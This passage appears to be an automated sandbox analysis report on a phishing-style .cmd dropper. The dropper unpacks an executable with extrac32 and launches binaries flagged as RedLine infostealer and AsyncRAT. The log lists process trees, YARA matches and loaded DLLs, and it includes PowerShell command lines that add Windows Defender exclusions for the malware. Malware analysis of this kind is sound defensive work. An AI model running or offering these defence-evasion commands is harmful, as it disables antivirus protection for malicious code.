Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_1_00402B90	20_1_00402B90
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_1_004073A0	20_1_004073A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_04D0B4A0	22_2_04D0B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_04D0B490	22_2_04D0B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_08D83AA0	22_2_08D83AA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_02F5B4A0	24_2_02F5B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_02F5B490	24_2_02F5B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_08A73AA8	24_2_08A73AA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_0340B490	26_2_0340B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_0340B470	26_2_0340B470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_08C93A98	26_2_08C93A98
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 28_2_004057B8	28_2_004057B8
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 29_2_004057B8	29_2_004057B8

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: String function: 0040A6C4 appears 136 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 03F63E9C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 03F54414 appears 246 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 03F63E20 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 03F5457C appears 835 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 03F5421C appears 64 times
Source: C:\Users\user\Links\icqplewR.pif	Code function: String function: 0040D606 appears 72 times
Source: C:\Users\user\Links\icqplewR.pif	Code function: String function: 0040E1D8 appears 132 times
Source: C:\Users\user\Links\Rwelpqci.PIF	Code function: String function: 04074414 appears 154 times
Source: C:\Users\user\Links\Rwelpqci.PIF	Code function: String function: 04083E20 appears 48 times
Source: C:\Users\user\Links\Rwelpqci.PIF	Code function: String function: 0407457C appears 570 times

Yara signature match

Source: 20.1.icqplewR.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.1.icqplewR.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 20.1.icqplewR.pif.4d88c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 20.1.icqplewR.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.1.icqplewR.pif.436038.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 20.2.icqplewR.pif.436038.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 19.2.Rwelpqci.PIF.226cc348.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.1.icqplewR.pif.436038.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.x.exe.229aebd8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 20.2.icqplewR.pif.4d88c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 20.2.icqplewR.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.1.icqplewR.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 20.2.icqplewR.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.1.icqplewR.pif.467468.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.x.exe.2297d7a8.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.x.exe.2297d7a8.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 20.1.icqplewR.pif.436038.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000014.00000001.1347456184.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000009.00000001.1214724739.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000014.00000002.1417837790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, rEkTNFLac8TI81Vwi6H.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, rEkTNFLac8TI81Vwi6H.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, rEkTNFLac8TI81Vwi6H.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, rEkTNFLac8TI81Vwi6H.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.3.icqplewR.pif.296c7830.0.raw.unpack, StaticNotifier.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, bLbDKIm580VmkPLDdbf.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, bLbDKIm580VmkPLDdbf.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, bLbDKIm580VmkPLDdbf.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, bLbDKIm580VmkPLDdbf.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 20.2.icqplewR.pif.1cee0000.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 20.2.icqplewR.pif.1cee0000.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 20.2.icqplewR.pif.1cee0000.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winCMD@33/28@0/1

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_03F5793C GetDiskFreeSpaceA,

3_2_03F5793C

Source: C:\Users\user\Links\icqplewR.pif

Code function: 9_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,

9_1_004019F0

Source: C:\Users\user\Links\icqplewR.pif

9_1_004019F0

Source: C:\Users\user\AppData\Local\Temp\x.exe

File created: C:\Users\All Users\7435.cmd

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1464:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
Source: C:\Users\user\Links\icqplewR.pif	Mutant created: \Sessions\1\BaseNamedObjects\XoFHv1TT4hWErxRo

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\user\AppData\Local\Temp\CAB07752.TMP

Jump to behavior

Source: C:\Users\user\Links\icqplewR.pif

Command line argument: 08A

9_1_00413780

Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Links\icqplewR.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Links\icqplewR.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\Links\icqplewR.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Links\icqplewR.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process

Source: C:\Users\user\Links\icqplewR.pif

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\extrac32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RFQ_HB648836_Enquiry.cmd	ReversingLabs: Detection: 26%
Source: RFQ_HB648836_Enquiry.cmd	Virustotal: Detection: 14%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\RFQ_HB648836_Enquiry.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\RFQ_HB648836_Enquiry.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\7435.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\38797.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\user\Links\icqplewR.pif C:\\Users\\user\\Links\icqplewR.pif
Source: C:\Users\user\Links\icqplewR.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Links\icqplewR.pif'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\user\Links\Rwelpqci.PIF "C:\Users\user\Links\Rwelpqci.PIF"
Source: C:\Users\user\Links\Rwelpqci.PIF	Process created: C:\Users\user\Links\icqplewR.pif C:\\Users\\user\\Links\icqplewR.pif
Source: C:\Users\user\Links\icqplewR.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'icqplewR.pif'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Links\icqplewR.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Links\icqplewR.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\RFQ_HB648836_Enquiry.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\7435.cmd""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\38797.cmd""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\user\Links\icqplewR.pif C:\\Users\\user\\Links\icqplewR.pif	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Links\icqplewR.pif'	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'icqplewR.pif'	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Process created: C:\Users\user\Links\icqplewR.pif C:\\Users\\user\\Links\icqplewR.pif	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: am.dll	Jump to behavior
